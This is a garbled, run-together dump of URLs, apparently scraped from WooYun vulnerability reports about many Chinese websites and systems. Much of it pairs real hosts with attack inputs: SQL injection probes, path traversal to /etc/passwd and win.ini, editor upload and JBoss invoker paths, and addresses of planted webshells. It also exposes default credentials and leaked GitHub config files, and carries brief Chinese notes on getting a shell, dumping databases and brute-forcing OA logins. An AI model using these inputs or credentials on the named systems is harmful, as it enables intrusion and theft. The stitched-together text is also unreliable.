https://hee.sflep.com:443/index.php?Itemid=10&limitstart=10&torscatid=2&option=com_rubberdoc&view=list https://service.sflep.com:443/index.php?Itemid=10&torscatid=2&option=com_rubberdoc&view=list https://sbs.sflep.com:443/teacherInfo.php?tid=95 https://sbs.sflep.com:443/articleList.php?classid=6 https://sbs.sflep.com:443/commendList.php?tid=1 https://sbs.sflep.com:443/schoolInfo.php?action=introduce&sid=66 https://sbs.sflep.com:443/resourceList.php?action=show&rid=158 https://sbs.sflep.com:443/newsList.php?classid=1 https://sbs.sflep.com:443/newsList2.php?classid=7 https://sbs.sflep.com:443/commendInfo.php?cid=6 https://sbs.sflep.com:443/articleList.php?classid=6 http://202.136.214.195:8082/register.aspx?action=checkInviteCode&code=angelina http://**.**.**.**/up/201209/ http://**.**.**.**/up/201201/ http://**.**.**.**:80/ http://m.xin.com:80/car/get_st_info/ http://www.9666.cn http://fenxiao.lvmama.com/m/index.jsp http://fenxiao.lvmama.com/m/order_list.jsp?state=1 http://fenxiao.lvmama.com/m/order_show.jsp?order_id=4581045 http://fenxiao.lvmama.com/m/2/list0.jsp?area_id=10034&order_cust_id=285818&user_id=123456 http://www.helloan.cn/ http://www.helloan.cn/process/findhc/hcs http://**.**.**.**/users/history_view/11316740 http://sy.crland.com.cn/admin@manager/login.php http://nc.emar.com/axis2/axis2-admin/login http://oa.ccib.com.cn/main.asp http://oa.ccib.com.cn/NewRegisterDo.asp http://180.97.69.170:8080/ http://**.**.**.**/NewsNormalList.aspx?SearchType=1&SearchKey=1有对sql关键字进行过滤,但忽略大小写可注入,如输入and http://haiertv.cn/appstoreView/index.xhtml http://180.97.70.61:8090/Login.aspx http://**.**.**.**/web/infor.aspx?cid=8 http://**.**.**.**/wssb/ http://**.**.**.**/ http://www.208521.com/index.php?m=sys&v=admin_show http://**.**.**.**/cpthd/user/login.action http://cloud.968309.com/wxapp/index.php?c=Webpacs&wechat_id=25 http://218.17.200.230:8080/gw/user/ http://218.17.200.230:88/?q=base http://oa.hismarttv.com/userLogin/user_index.php http://mail.hisense.com/ https://ssl.hisense.com/+CSCOE+/logon.html http://**.**.**.**/leadership.asp https://github.com/victor-han/yixin_youngpioneer4 https://github.com/victor-han/yixin_youngpioneer4/blob/34fbe6bdcfde130a4099ef74a940708eb4fcb30d/target/yomisupply/WEB-INF/classes/prod/db.properties jdbc:mysql://10.120.146.214:3306/yixin_youngpioneer https://github.com/victor-han/yixin_youngpioneer4/blob/34fbe6bdcfde130a4099ef74a940708eb4fcb30d/target/classes/applicationContext-ip.xml https://github.com/victor-han/yixin_youngpioneer4/blob/master/Servers/Pivotal%20tc%20Server%20Developer%20Edition%20v3.1-config/jmxremote.password http://oa.**.**.**.**/vmeet/wbUpload.php?fileName=test.php+ http://**.**.**.**/bugs/wooyun-2015-0135774 http://58.62.201.210/ http://wan.deyi.com/ http://wan.deyi.com/web/coupon?id=608 http://**.**.**/RoadAdmin/ http://**.**.**/console/login/LoginForm.jsp http://**.**.**/ma/ma3.jsp http://**.**.**/showthread.phpt=156643 http://**.**.**/dis9_tysan http://**.**.**.**/UserManage/Login.aspx?FindPwd www.springcocoon.com/Search.aspx www.springcocoon.com http://www.springcocoon.com http://www.weedai.com:80/dangan/index.html?province=1 http://**.**.**.**/into/Search.aspx?KeyWord= http://**.**.**.**/article.php?id=298 http://**.**.**.**/list.php?id=18 http://**.**.**.**/manager/index.php不做进一步测试了。。 http://**.**.**.**/cpzt/kcproduct.jsp?where=&Type=004004&pros= http://**.**.**/ https://**.**.**.**/etrading/F5testw.jsp http://www.faw-vw.com/autoparts Accept:text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 http://www.hhrfs.com/notice/index?p=* http://www.qdmixc.com/ http://www.qdmixc.com/robots.txt http://**.**.**.**/bugs/wooyun-2010-0123096 http://**.**.**.**/infodisplay.do?method=getOneInfoDisplay&infoid=42112e27:14350bcb20a:-7ff2 http://www.dfsszc.com/ http://www.dfsszc.com/NewsList.aspx?m=20131120105112043638%27%20AND%208228=8228%20AND%20%27we8%27=%27R0we8 http://www.dfsszc.com/NewsList.aspx?m=20131120105112043638%27%20AND%208228=8228%20AND%20%27we8%27=%27we8 http://www.dfsszc.com/NewsList.aspx?m=20131120105112043638%27%20AND%208228=8228%20AND%20%27we8%27=%27R0we8 http://oa.guanghui.com/ http://oa.guanghui.com/tools/SWFUpload/upload.jsp height:20px;BORDER http://oa.guanghui.com/null1.jsp http://**.**.**.**/webhall/NewsDatail3.aspx?Id=198231 http://www.politics.fudan.edu.cn/viewprofile.php?id=1357 http://sces.tongji.edu.cn/firstLoginRst.jsp http://ilife.homelink.com.cn/aigou/admin.php?m=Index&a=login http://oa.xsdzq.cn/C6/Jhsoft.Web.login/PassWordSlide.aspx http://oa.xsdzq.cn/C6/Jhsoft.Web.login/NewView.aspx?ID=1* http://oa.xsdzq.cn/C6//JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=123456* http://**.**.**.**/bugs/wooyun-2010-098655直接上传获得一句话 http://**.**.**.**:8080/netinnet_cwgl_v60/userfiles/common/File/D70E068BDBE6321D00000002499030.jsp Id:0;996 Package:Negotiate User:iZ23aan1aamZ$ Domain:WORKGROUP Id:0;607032965 Package:Negotiate User:DefaultAppPool Domain:IIS Id:0;5049057 Package:NTLM User:Administrator Domain:iZ23aan1aamZ Id:0;997 Package:Negotiate User:LOCAL Id:0;24602 Package:NTLM http://kfgl.hasee.com/news/Play.asp?id=120 jdbc:oracle:thin:@**.**.**.**:1521:csb http://**.**.**.**/ ipsec.bak/cert/cert_req.php?arg=create ipsec.bak/cert/import_cert.php cd:56:d7 http://lzg.cninsure.net/oauth/sql/.svn/entries http://www.jk309.net/resource/.svn/entries http://www.jk309.net/.svn/entries http://bbs.968309.com/archiver/.svn/entries http://bbs.968309.com/source/plugin/.svn/entries http://bbs.968309.com/source/.svn/entries http://bbs.968309.com/static/.svn/entries http://bbs.968309.com/static/image/.svn/entries http://bbs.968309.com/uc_server/.svn/entries http://www.jk309.cn/server-status http://lyh.968309.com/server-status http://www.jk309.net/server-status http://km.crv.com.cn/km/ http://vacation.homsom.com/Order/TravelOrderDetail?travelNumber=TB000020418 http://vacation.homsom.com/Order/TravelOrderDetail?travelNumber=TB000020419 http://vacation.homsom.com/Order/TravelOrderDetail?travelNumber=TB000020420 http://www.sun-hoo.cn/ http://**.**.**.**/welcome/Article_Print.asp?ArticleID=821 http://**.**.**.**/welcome/admin_index.asp http://**.**.**.**/bugs/wooyun-2015-0143242 http://www.sinosig.com/payment_weixinPageUrl.action?orderNo=P270000150508821605&source=wx&sso=false http://www.sinosig.com/payment_weixinPageUrl.action?orderNo=P270000150508821$i http://**.**.**.**:8080/themelist.php?web=jkldfdfdf24df4er4fgrtere32kk565655kjk3l4j34ytytv5jkl65jkl4j43l343l4j3l4j3jkl4j3l4j3l4j4jerkl4jklkjkld&class=&code=1%27%3B&class=part http://**.**.**.**:8080/themelist.php?web=jkldfdfdf24df4er4fgrtere32kk565655kjk3l4j34ytytv5jkl65jkl4j43l343l4j3l4j3jkl4j3l4j3l4j4jerkl4jklkjkld&class=&code=1%27%3B&class=part http://**.**.**.**:8080/themelist.php?web=jkldfdfdf24df4er4fgrtere32kk565655kjk3l4j34ytytv5jkl65jkl4j43l343l4j3l4j3jkl4j3l4j3l4j4jerkl4jklkjkld&class=&code=1%27%3B&class=part http://**.**.**.**:8080/themelist.php?web=jkldfdfdf24df4er4fgrtere32kk565655kjk3l4j34ytytv5jkl65jkl4j43l343l4j3l4j3jkl4j3l4j3l4j4jerkl4jklkjkld&class=&code=1%27%3B&class=part http://**.**.**.**:8080/themelist.php?web=jkldfdfdf24df4er4fgrtere32kk565655kjk3l4j34ytytv5jkl65jkl4j43l343l4j3l4j3jkl4j3l4j3l4j4jerkl4jklkjkld&class=&code=1%27%3B&class=part http://**.**.**.**:8080/themelist.php?web=jkldfdfdf24df4er4fgrtere32kk565655kjk3l4j34ytytv5jkl65jkl4j43l343l4j3l4j3jkl4j3l4j3l4j4jerkl4jklkjkld&class=&code=1%27%3B&class=part http://cuc.dooland.com/site/magazine/head_brand.php?l=A&t=0.029984969412907958 http://**.**.** http://220.181.105.91:8888/download/uploadAttachement/1414058226036/bmp_sy_test.bmp http://220.181.105.91:8888/download/144/ http://220.181.105.91:8888/download/144/29/94277420/ http://220.181.105.91:8888/download/144/28/90767358/ http://220.181.105.91:8888/download/144/30/85474937/ http://**.**.**.**/claim-jy/LoginServlet http://**.**.**.**/claim-jy/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=&CurrentFolder=/../ http://**.**.**.**/claim-jy/editor/filemanager/browser/default/frmupload.html http://**.**.**.**/service/index.jsp http://**.**.**.**/member/reg.asp http://**.**.**.**/index.php/commonform-showmsg.html?id=113 https://www.wanda-gh.com/wcm/app/main.jsp https://github.com/lifang/FudanAppManage/blob/92c0b1de6e3ef1e6f927de348ef4b354ff90d017/src/main/resources/config.properties http://**.**.**.**/trunklogin/turkLogin/login.jsp http://club.mangocity.com/act/toptraveller/show.aspx?sw=xb1rUWl7';%20waitfor%20delay%20'0:0:0'%20--%20&type=1 http://**.**.**.**/ http://**.**.**.**/model/TwoGradePage/Feedback.aspx?id=11343&openid=198 http://**.**.**.**/model/TwoGradePage/Feedback.aspx?id=11343&openid=198 http://**.**.**.**:8070/model/TwoGradePage/Feedback.aspx?id=11343&openid=198 http://**.**.**.**/model/TwoGradePage/Feedback.aspx?id=11343&openid=198 http://**.**.**.**/model/TwoGradePage/Feedback.aspx?id=11343&openid=198 http://**.**.**.**/model/TwoGradePage/Feedback.aspx?id=11343&openid=198 http://**.**.**.**/model/TwoGradePage/Feedback.aspx?id=11343&openid=198 http://**.**.**.**:81/model/TwoGradePage/Feedback.aspx?id=11343&openid=198 http://**.**.**.**/model/TwoGradePage/Feedback.aspx?id=11343&openid=198 http://**.**.**.**/model/TwoGradePage/Feedback.aspx?id=11343&openid=198 http://**.**.**.**:8080/wz12333net http://**.**.**.**:8080/wz12333net/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://**.**.**.**:8080/wz12333net/UserFiles/Image/wooyun.jsp http://**.**.**.**:8080/wz12333net/UserFiles/Image/foot.jsp https://**.**.**.**/nickflyer/osscms/blob/master/config.php http://**.**.**.**/admin.php http://**.**.**.**/admincp.php?action=models http://**.**.**.**/data/model/import_1443159707_qkYp9V/c.php https://github.com/songkang1/webc/blob/fd905971e03a2858c5749833a3c45edb48368b0f/App/Common/Conf/config.php https://github.com/songkang1/webc/blob/fd905971e03a2858c5749833a3c45edb48368b0f/DB/webc.sql http://irou.intime.com.cn:8380/supplier/jsp/login.jsp url:http://tj.fruitday.com www.qingmayun.com www.qingmayun.com www.qingmayun.com http://appbg.xiaoma.com/users/sign_up http://122.224.218.142:7070/supplier/jsp/index.jsp http://irou.intime.com.cn:8380/supplier/jsp/login.jsp http://**.**.**.**:8003/page/website/infonews/list?classid=34 http://**.**.**/cms/web/testsql.jsp_ http://**.**.**/cms/web/testsql.jsp_ http://**.**.**/bjutCms/cms/web/testsql.jsp_ http://**.**.**/fsmcms/cms/web/testsql.jsp_ http://**.**.**/fsmcms/cms/web/testsql.jsp_ http://**.**.**/fsmcms/cms/web/testsql.jsp_ http://**.**.**/fsmcms/cms/web/testsql.jsp_ http://**.**.**/fsmcms/cms/web/testsql.jsp_ http://**.**.**/fsmcms/cms/web/testsql.jsp_ http://**.**.**/cms/cms/web/testsql.jsp_ http://**.**.**/fsmcms//cms/web/testsql.jsp_ http://**.**.**/cms/web/testsql.jsp http://wspx.91huayi.com http://**.**.**.**/link?url=219W2K-QvrqF35U0re8O5cr3lyV3YAohUj0iYw6FVWoSly9kNmH5DyPETtIlKao4WXAzfVI9Xiw6U1onvV4bX-JW8JNNcp6nm4PsooiIKl3 http://m.zufangzi.com/entrust/entrustController/entrustPage.do?code=20098899 http://**.**.**/web/zwdt/jjj.BjcxServlet_ http://**.**.**/scweb/web/zwdt/jjj.BjcxServlet_ http://**.**.**/web/zwdt/jjj.BjcxServlet http://**.**.**.**/Webwsfw/Projectindex/?sb= http://**.**.**.**/Webwsfw/Projectindex/?sb= http://**.**.**.**/Webwsfw/Projectindex/?sb= http://**.**.**.**/Webwsfw/Projectindex/?sb= http://**.**.**.**/Webwsfw/Projectindex/?sb= http://**.**.**.**/Webwsfw/Projectindex/?sb= http://**.**.**.**/Webwsfw/Projectindex/?sb= http://**.**.**.**/Webwsfw/Projectindex/?sb= http://**.**.**.**/Webwsfw/Projectindex/?sb= http://**.**.**.**/bugs/wooyun-2010-063832 http://**.**.**.**/talent/upload.jsp http://old.noahedu.com/wenba/handle.php http://old.noahedu.com/w http://www.notedyy.com/vipchat/VerifyCodeServlet?var=clusterid http://www.notedyy.com/vipchat/servlet/upfile.do http://58.83.190.26/memadmin http://wxq.lefucn.com/weixin/ http://huodong.kuwo.cn/huodong/newact/admin.jsp http://**.**.**.**/dqgz_list/&newsCategoryId=12.html http://**.**.**.**/view/proxy_site.php?func=listAll&catalog=060404 http://**.**.**.** db0a954:12165c96687:-7ff7 http://bbs.midea.com/admin.php http://www.xuanhao.com/spxx/liantong.php?rd=-1&sr=-1&yy=-1&gl=-1&d=4&flbm=0105&hd=&jg=&sw= http://job.shangdu.com/hjlaowu.php?act=1&city_id=1&p=2 http://**.**.**.**/zh-cn/,如图所示: success:true,message:,data:{src:'/upfile/images/2015-9/25191949.php'},total:1,errors:''},访问shell地址,http://**.**.**.**//upfile/images/2015-9/25191949.php,如图所示: http://**.**.**.**/phpMyAdmin root:root,phpmyadmin权限为root,可以直接脱裤或进一步getshell http://**.**.**.**/Admin.php/网站后台admin:admin888直接登录,网站后台可以进行数据库备份下载或者进一步getshell。 http://mail.100msh.com http://**.**.**.**/index/Downloadnr.aspx?DID=25359 http://www.wooyun.org/bugs/wooyun-2013-034737 m.tuniu.com/svnInfo.php http://hl.pay.joy.cn/search/createtime/1.htm?Keyword=-1 https://m.chinaums.com/ http://m.chinaums.com:80/ E3C8BA7C9C3C71E347481E0390F20273:FG=1 http://**.**.**.**/account/login.action http://114.80.99.111/1.tar.gz http://114.80.99.111/ahero/ http://114.80.99.111/server/ http://**.**.**.**/order/orderstatus?ordernum=PO201509221357345734066 http://hr.acmcoder.com/xycloveManage admin:admin http://**.**.**.**/home.c http://**.**.**.**/c/ca/travel http://**.**.**.**/c/ca/mall/mall-search?page=1&sCat=1 http://**.**.**.**/wp-login.php http://**.**.**.**/c/ca/travel/travel-timetable jdbc:oracle:thin:@**.**.**.**:1521:oradb jdbc:oracle:thin:@**.**.**.**:1521:orcl http://**.**.**.**:8080/questionInves/pilupdf.jsp?url=/home/tomcat/apache-tomcat-6.0.35/webapps/mgt/pilufile/pilu1398676666622.pdf http://**.**.**.**:8080/questionInves/pilupdf.jsp?url=/home/tomcat/apache-tomcat-6.0.35/webapps20150324.tar.gz http://**.**.**.**/ inurl:jyreg.php inurl:xyuserinfo.php http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/Appactivity/registration_login.aspx http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/download/ http://**.**.**.**:81/ http://**.**.**.** http://**.**.**.**/a.picauto?path=C:\Windows\win.ini http://**.**.**.**/public/a.picauto?path=C:\Windows\win.ini http://bbs.social-touch.com/forum.php http://**.**.**.**/searchresult http://www.haorc.com/dangyuan/search.asp?fl=44 http://www.haorc.com/zdyj/zdnew.asp?newtype=0601&ai_rows=13&ai_length=28&n=%27 http://121.34.249.229 http://121.34.249.229/scm/DaemonMail?operation=read&type=100&mailid=71267 http://121.34.249.229/scm/DaemonFileDownload?fileid=90374 http://121.34.249.229/scm/DaemonSCMUserVender?operation=set&venderid=000016&buid=19×tamp=1443240601506& http://121.34.249.229/scm/DaemonSCMVenderAdmin?focus=venderdiy&operation=list http://121.34.249.229/scm/DaemonSCMUserVender?operation=set&venderid=000014&buid=19×tamp=1443240601506& http://121.34.249.229/scm/DaemonSCMVenderAdmin?focus=venderdiy&operation=list http://122.224.183.4:80/jcms/interface/ldap/ldapconf.xml http://221.231.137.195/jcms/interface/ldap/ldapconf.xml http://202.108.199.114:80/jcms/interface/ldap/ldapconf.xml http://202.108.199.114/jcms/interface/ldap/ldapconf.xml http://6bur.cscec.com/jcms/interface/ldap/ldapconf.xml http://cengangpcs.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml http://219.146.58.42/jcms/interface/ldap/ldapconf.xml http://cq.ea-spring.com/jcms/interface/ldap/ldapconf.xml http://caiyuan.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml http://bingmei.sdcdc.cn/jcms/interface/ldap/ldapconf.xml http://3bur.cscec.com/jcms/interface/ldap/ldapconf.xml http://csbj.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml http://changspcs.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml http://blbj.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml http://cz.anxiang.gov.cn/jcms/interface/ldap/ldapconf.xml http://chart.sinotrans-csc.com/jcms/interface/ldap/ldapconf.xml http://chengdpcs.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml http://bj.clubchinachic.com/jcms/interface/ldap/ldapconf.xml http://dandong.xiangshan.gov.cn/jcms/interface/ldap/ldapconf.xml http://dayupcs.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml http://chdj.sinotrans-csc.com/jcms/interface/ldap/ldapconf.xml http://app.hanweb.com.cn/jcms/interface/ldap/ldapconf.xml http://app.hanweb.com.cn/jcms/interface/ldap/receive.jsp?state=C&result=T&loginuser=e2V1Z3UdA2sNaw==&loginpass=DEIBRXBGcUQOM3g0 http://tieba.baidu.com/f/search/ures?ie=utf-8&un=USERNAME http://**.**.**.**/index.php http://**.**.**.**/index.php?mid=7&&action=showArticle&&articleid=102 http://**.**.**.**/index.php?mid=7 http://tuan.mangocity.com/product/productlistbysearch.aspx?queryStrL=%E8%9C%9C%E6%9C%88 http://**.**.**.**/weblogic/jdbc-data-source xmlns:sec="http://**.**.**.**/weblogic/security xmlns:wls="http://**.**.**.**/weblogic/security/wls xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xsi:schemaLocation="http://**.**.**.**/weblogic/jdbc-data-source http://**.**.**.**/weblogic/jdbc-data-source/1.0/jdbc-data-source.xsd http://**.**.**.**:80/ http://**.**.**.**:8080/hmfwzx/web/zxgtMore.jsp?type=0 http://**.**.**.**:8080/hmfwzx/web/sub_event.jsp?subid=63e8579358594a5295e64625a4178844 http://**.**.**.**:8080/hmfwzx/web/bssx.jsp?eventid=4DFC90A5C9ED444BA32910969709F5C6 http://**.**.**.**:8080/hmfwzx/web/shouye_2.jsp?subjectid=B64E207FF5A745EA94F8A5B56040DE53 http://**.**.**.**:8080/hmfwzx/web/zxgtMore.jsp?subjectid=65749ed5b4ff4d378624e761aa120dec&type=0 http://**.**.**.**:8080/hmfwzx/web/zixunList.jsp?subjectid=65749ed5b4ff4d378624e761aa120dec http://**.**.**.**:8080/hmfwzx/web/bssx.jsp?docId=DFE17B9412F149A2B604B3B82006C0ED&eventid=4DFC90A5C9ED444BA32910969709F5C6 http://**.**.**.**/zncs/gh/news/ShowMessage.asp?fid=169 http://**.**.**.**/zncs/gh/news/ShowMessage.asp?fid=135 http://**.**.**.**/admin/ http://111.205.37.193:8001/console http://111.205.37.193:8001/wpp/foot.jsp http://www.ccamls.org/newslist.php?pid=771 http://www.ccamls.org/newslist.php?pid=771+xor+1=2 http://www.ccamls.org/newslist.php?pid=771+xor+1=1 http://hk5.midea.com http://www.dfss-club.com/jl/see.jsp?id=16 http://**.**.**.**:8070/Api/Account/SignInAndGetUserPlus http://**.**.**.** http://**.**.**.**/admin/index.htm http://**.**.**.**/admin/usermgr/user.do http://**.**.**.**/admin/usermgr/user.do?act=to_logon www.zhuzhu56.com、www.zhuzhuqs.com、www.zzvan.com。 https://github.com/zhuzhu56/zzqs-testing/blob/dacb6318d64700b75964e4458046136093bd0246/%E8%B4%A6%E5%8F%B7.txt,上层目录也有很多敏感信息的。 zhuzhuqs.com/1qazXCVB zhuzhuqs.com/direction_2014 zhuzhuqs.com/Direction_2014 zhuzhuqs.com/Direction_2015 http://www.xinnet.com/ www.400cx.com http://**.**.**.**/fgw/mailboxlistcon.php?did=1001%27&wid=119 http://pm.made-in-china.com/resin-doc http://202.104.30.82/login/login.do http://**.**.**.**/page.aspx?id=1 http://**.**.**.**/sys/loginInput.action,广东省茂名市国土资源局OA系统,验证码可重用,用常用用户名和弱口令123456可获得一个有效账号,登陆后可查看通讯录,将通讯录再做成字典跑,可获得28个有效账号,登陆之后,可查看内部敏感文件,发送短信等。 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/jcpu/ http://**.**.**.**/ http://**.**.**.**/cjcmmte/ http://**.**.**.**/jrs/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/kcdz/ http://**.**.**.**/dzyktcn/ http://**.**.**.**/ http://**.**.**.**/ch/reader/inner_key_query_article_list.aspx http://**.**.**.**/ch/reader/key_query_article_list.aspx http://livina.dongfeng-nissan.com.cn/spadmin/gift_excel.php?EndTime=1&GifeType=1&ok=1&SatTime=1 http://overseas.5i5j.com:80/ http://**.**.**.**/ztpd/detail.phtml?path=%D6%D8%D2%AA%D7%A8%CC%E2&catId=001002:016002&newId=13527&big5=0 http://**.**.**.**/view.asp?id=7013 http://wooyun.org/bugs/wooyun-2015-0143603 http://www.zhuzhu56.com/)注册一个柱柱签收的用户,然后找回密码,收到的邮件是这样的: http://219.143.38.228/ http://oa.gyzq.com.cn/,登陆时会提示详细的用户出错信息 http://www.yueyueshu.com/product.php?catid=2 http://baoxian.jbw666.com:8001/admin/login.jsp http://www.ie.zjut.edu.cn/htm/kexue/lunwenview.asp?id=167 http://14.116.76.23:7001/tw/ http://14.116.76.23:7001/console/login/LoginForm.jsp http://14.116.76.23:7001/ma/ma1.jsp jdbc:oracle:thin:@localhost:1521:orcl http://club.womai.com/home.php?mod=space&uid=15071296&do=album&picid=9125 http://**.**.**.**/ListLeaseHouseInfoSearch.aspx?a=1&area=a03&area2=%25u4e00%25u4e2d http://jywb.zjol.com.cn/detail.aspx?id=20150811165803d32e http://eps.csrcj.com http://eps.csrcj.com/custom/GroupNewsList.aspx?companyId=&child=&buyGroupid=1302&groupId=151 http://eps.csrcj.com/library/editornew/Editor/temp.asp http://im.midea.com/,下载个美信ios移动客户端,登录处无验证码和密码错误次数限制,但是用户名是什么格式呢? https://vpn.midea.com/sslvpn/Login/Login https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doShowproductpage&productTab=downloads&product=175&version=VPN%20Clients%20for%20Windows#r60hfa02 http://**.**.**.**:80/ http://114.251.242.182/ http://**.**.**.**/support/digital_cameras/software_series.php?catid=13 http://wan.meizu.com http://wan.meizu.com/praise/users/{此处为uuid}?version=20882&page=2 http://wan.meizu.com/praise/users/ad25a188-856d-4a55-be31-28d6ef605319?version=20882&page=2 http://member.360hitao.com/Store_Rebates/azIndexInside.aspx?Letter=O http://member.360hitao.com/store_rebates/store/storedetailcoupon.aspx?cat=36075162379976567 http://**.**.**.**/login/ http://**.**.**.**/downy.php?id=32&c1=220+xor+1=1 http://**.**.**.**/downy.php?id=32&c1=220+xor+1=2 http://5000.midea.com.cn http://5000.midea.com.cn/midea/login.do http://**.**.**.**/logout.do http://**.**.**.**/app/sltd/?c=main&a=detail&id=11837 http://kdjyxk.post.gov.cn/company/reg.jsp?provinceId=0 http://kdjyxk.post.gov.cn http://www.ftchinese.com/m/marketing/intelligence.html?type=interactive&id=4468 http://**.**.**.**/Login.aspx http://**.**.**.**/Site/article/type/28/id/51.html http://**.**.**.**/admin/ http://**.**.**.**/user/passwd.txt http://**.**.**.**/**.**.**.**.txt http://bug.codoon.com/just_test/ http://bug.codoon.com/admin/ SITE:http://account.pcjoy.cn http://**.**.**.**/do/tools/student.html?id=100000000361661 http://www.changan-mazda.com.cn/search?q=Mazda3%20AXELA&t=97 http://www.changan-mazda.com.cn/news/index?page=1&year=2015 http://mail.neusoft.edu.cn/extmail/cgi/index.cgi http://mail.neusoft.edu.cn/ http://iwatchome.tom.com/Wiki_style.php?w2_id=261&page=1 http://iwatchome.tom.com/Wiki_style_content.php?keyword=&w3_id=7 http://iwatch.tom.com/Wiki_style.php?w2_id=261&page=1 http://**.**.**.**/bugs/wooyun-2015-0129375 http://**.**.**.**/snsite/sn_user.do?method=editForm&userid=3 http://**.**.**.**/Article_zs.asp?ClassID=4 http://**.**.**.**/Admin_Index.asp http://**.**.**.**/admin/database/article.mdb http://**.**.**.**:8086/newswebsite/admin/ http://**.**.**.**:8086/newswebsite/uploads/1122.php UserName:netcenterali http://sap.hismarttv.com http://sap.hismarttv.com/?detail=1&id=308039 http://adnew.adimg.jctrans.com/ADClick.aspx?id=12117&tp=0&url=/CQmVplXX+MKvQ7ZSxYvYHUZtsw3ae+gIOLb9Ej4agVfyVVT4JN+e/d2yjVnMN05 http://106.38.193.164/phpmyadmin/ http://202.104.30.95/web/rdlogin.jsp http://202.104.30.95:8080/web/SubmitLogin.do http://www.sinotrans.com/vc/vc/style/opr_copycode.jsp?id=1 http://interface.api.haodai.com/capi/sys/up_push_code?os_type=1&appid=2&imei=A0000000000000&app_version=27000&auth_tms=20150927122749&auth_did=218372&auth_dsig=7e63707f4c2c385c&auth_uid=402888&auth_usig=c28be912f3a53c23&pushcode=ed0e046ea6e40d71a4ba375cc010decd http://**.**.**.**:88/OpenPublicCourse.aspx?cid= http://**.**.**.**:808/OpenPublicCourse.aspx?cid= http://newlife.shangdu.com:80/ http://alog.cnfol.com/browserinfo.php http://**.**.**.**:8001 https://github.com/jiangkunwei/dc/blob/9778fb5f182a0dde6f36cf95bdfc8279eb74ec88/config/config.php http://cabin.airchina.com.cn/cwzb/fileDownload?FilePath=../../../../../../../../../../../../etc/passwd&FileName=a.txt http://cabin.airchina.com.cn/cwzb/fileDownload?FilePath=../../../../../../../../../../../../etc/nail.rc&FileName=a.txt http://www.netway.net.cn/jianjie.php,如图所示: http://www.netway.net.cn/chanpin.php?pro_id=5,如图所示: http://www.netway.net.cn/chanpin.php?pro_id=6",存在注入,如图所示: http://www.netway.net.cn/chanpin.php?pro_id=6 http://www.netway.net.cn/chanpin.php?pro_id=6 http://account.wzdai.com/register.shtml http://www.icampus.ren/ http://www.yunda156.com/ http://120.24.234.112:81 http://**.**.**.**/list.asp?id=85 http://**.**.**.**/admin/login.asp http://**.**.**.**/we/admin_login.asp http://**.**.**.**/UploadFile/201592874533138.asp http://58.83.190.179/memadmin/index.php?action=set.con http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**//_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://121.35.248.249:9001 http://121.35.248.249:9002//invoker/JMXInvokerServlet system:type=ServerInfo http://121.35.248.249:9002//invoker/JMXInvokerServlet system:type=ServerInfo http://121.35.248.249:9002//invoker/JMXInvokerServlet admin:service=DeploymentFileRepository http://121.35.248.249:9002/myname/wy.jsp http://**.**.**.**/oep/tchlist.action http://**.**.**.**/oep/app/ http://**.**.**.**/oep/app/ttadd.action http://**.**.**.**/oep/resource/ckeditor/uploader/upload/images/fil http://202.104.30.152:8011/MideaServiceMain.asmx tem:alterGuid tem:alterGuid http://www.ttkdex.com.hk/Page/Logistics/InspectMessage.aspx?StorageNumber= http://b2b.cr-power.com/ http://b2b.cr-power.com/ispweb/file/downLoad.do?fileIds=259311 http://b2b.cr-power.com/ispweb/file/downLoad.do?fileIds=10001 http://www.takee.com.cn/product/index/?id=45 http://bbs.tingyun.com/uc_server/shell.php http://202.104.30.152 http://wmcrm.baidu.com/crm?qt=neworderlist http://wmcrm.baidu.com/crm?qt=neworderlist http://wmcrm.baidu.com/crm?qt=neworderlist http://tc.homelink.com.cn http://tc.homelink.com.cn/Academy/AcademyCertificateCourseReg03.aspx http://tc.homelink.com.cn/Academy/AcademyCertificateCourseReg05.aspx ps:wooyun.aspx为测试所用 http://nts.koolearn.com/ http://eshop.airchina.com.cn//Draw/Draw_listAja http://**.**.**.**/weixin/weixin/binding!bindUser.action http://**.**.**.**/weixin/weixin/binding!bindUser.action http://**.**.**.**/weixin/weixin/binding!bindUser.action http://www.9666.cn/passRestore/showPassRestore.action http://218.205.171.101:8080/ http://ess.cninsure.net http://ess.cninsure.net:80/ http://mail.zzvcom.com/php/report/include/config.inc http://**.**.**.**/ http://**.**.**.**/Data/ http://**.**.**.**/sdgp2014/regist/expappend_file.jsp?ids=-1&varnum= http://club.mangocity.com/tongyou/default.aspx?btime=01/01/1967&dep=1&deptk=&des=-1 jdbc:oracle:thin:@**.**.**.**:1521:gags http://s.p.qq.com/pub/jump?d=AAAR6KES&_wv=1027)我已经打电话让工作人员提示危险网站了(电脑用户发链接可以看到危险,可是用分享的方式,丝毫没有任何影响),手机分享也是压根不拦截,因为这个是腾讯官方的地址。 